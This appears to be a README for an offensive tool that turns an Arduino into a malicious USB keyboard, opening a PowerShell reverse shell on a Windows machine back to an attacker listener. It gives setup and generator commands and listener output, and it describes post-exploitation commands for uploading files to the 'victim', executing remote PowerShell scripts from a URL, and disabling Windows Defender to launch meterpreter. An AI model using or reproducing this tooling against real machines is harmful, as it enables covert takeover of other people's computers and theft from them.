This project connects a Windows machine, by way of an Arduino, to a listening server over TCP using a given host and port.
Note: A video tutorial will be added on the main Lear Hacking YouTube channel soon!
Once the Arduino is plugged into the Windows machine, you'll have a PowerShell session running as that user.
To complete this you will first need to install the Arduino IDE and the following Python packages:
pwn, argparse
- Install the Arduino IDE.
- Install python on Linux:
sudo apt update
sudo apt-get install python3.8
- Install pwn
pip install pwn
# or
python3 -m pip install pwn
After cloning this repository onto your Linux machine, you can view the help menu of the listener tool:
python3 listen-usb.py -h
usage: listen-usb.py [-h] [-admin] [-debug] --lport LPORT --lhost LHOST --keyboard KEYBOARD
0x539 tool. A tool to connect to thepowershell reversed shell from arduino mini pro.
optional arguments:
-h, --help show this help message and exit
-admin get admin access to powershell but it hopefully press the yes to runAs."
-debug debug mode will keep the cmd window open"
--lport LPORT port example: 4444
--lhost LHOST host example: attackerwebsite.com (or an ip 198.23.44.132)
--keyboard KEYBOARD keyboard example: azerty (or qwerty)
usage: listen-usb.py [-h] [-debug] --lport LPORT --lhost LHOST --keyboard
KEYBOARD
Running the next command generates an Arduino C file, which is the exploit that will be uploaded to the Arduino (I'm using an Arduino Pro Mini ATmega32U4).
python3 listen-usb.py --lport 9001 --lhost 192.168.183.20 --keyboard qwerty
This will keep listening on the specified port and generate a new file called arduino_qwerty.c.
# first terminal
kali@kali:~/Documents/tools/github-proj/usb-reverse$ python3 listen-usb.py --lport 9001 --lhost 192.168.183.20 --keyboard qwerty
[+] Creating file: arduino_qwerty.c
[+] File created check it on the current path
[+] Listening..
[+] Trying to bind to 0.0.0.0 on port 9001: Done
[┐] Waiting for connections on 0.0.0.0:9001
# second terminal
kali@kali:~/Documents/tools/github-proj/usb-reverse$ ls
arduino_qwerty.c exploits listen-usb.py README.md
The next step is to compile the Arduino C file in the Arduino IDE mentioned earlier. I'm not going to go through that because there are plenty of tutorials out there on compiling and uploading Arduino C code, so just google that, or check this video playlist: Arduino Workshop - Chapter One - Hello World Example.
Now, once you plug the Arduino into the USB port, you will be connected to the tool:
kali@kali:~/Documents/tools/github-proj/usb-reverse$ python3 listen-usb.py --lport 9003 --lhost 192.168.183.20 --keyboard qwerty
[+] Creating file: arduino_qwerty.c
[+] File created check it on the current path
[+] Listening..
[+] Trying to bind to 0.0.0.0 on port 9003: Done
[+] Waiting for connections on 0.0.0.0:9003: Got connection from 192.168.183.1 on port 58629
___ ___ ___ _____ ____ ___
/ _ \ \ \ / / | ____| |___ \ / _ \
| | | | \ V / | |__ __) | | (_) |
| | | | > < |___ \ |__ < \__, |
| |_| | / . \ ___) | ___) | / /
\___/ /__/ \__\ |____/ |____/ /_/
Tool.
!0x53O>
Now that you're connected to the tool, you can interact with PowerShell and use the tool's commands.
Type help to get the help menu:
commands:
ps connect to powershell
upload download file
enumerate enumerate windows vulnerabilities
urlexec execute a powershell script from a link
meterpreter run meterpreter default port 9090
help open this help menu
exit quit this tool
ps: Gives you a PowerShell prompt on that Windows machine.
upload: Uploads a file to the victim machine.
usage:
upload <link> <filename>
example:
upload https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1 windowsEnum.ps1
enumerate: Enumerates the Windows privileges and information.
urlexec: Executes a PowerShell script from a URL.
meterpreter: Generates a reverse TCP exe file with the default lport 9090 (you can change the lport and lhost together with the httpport) and runs it on the victim's machine after disabling Windows Defender (-admin must be specified after listen-usb.py before generating the Arduino C payload), which gives you a meterpreter prompt (with all privileges).
mp
- This tool was created by l0x539.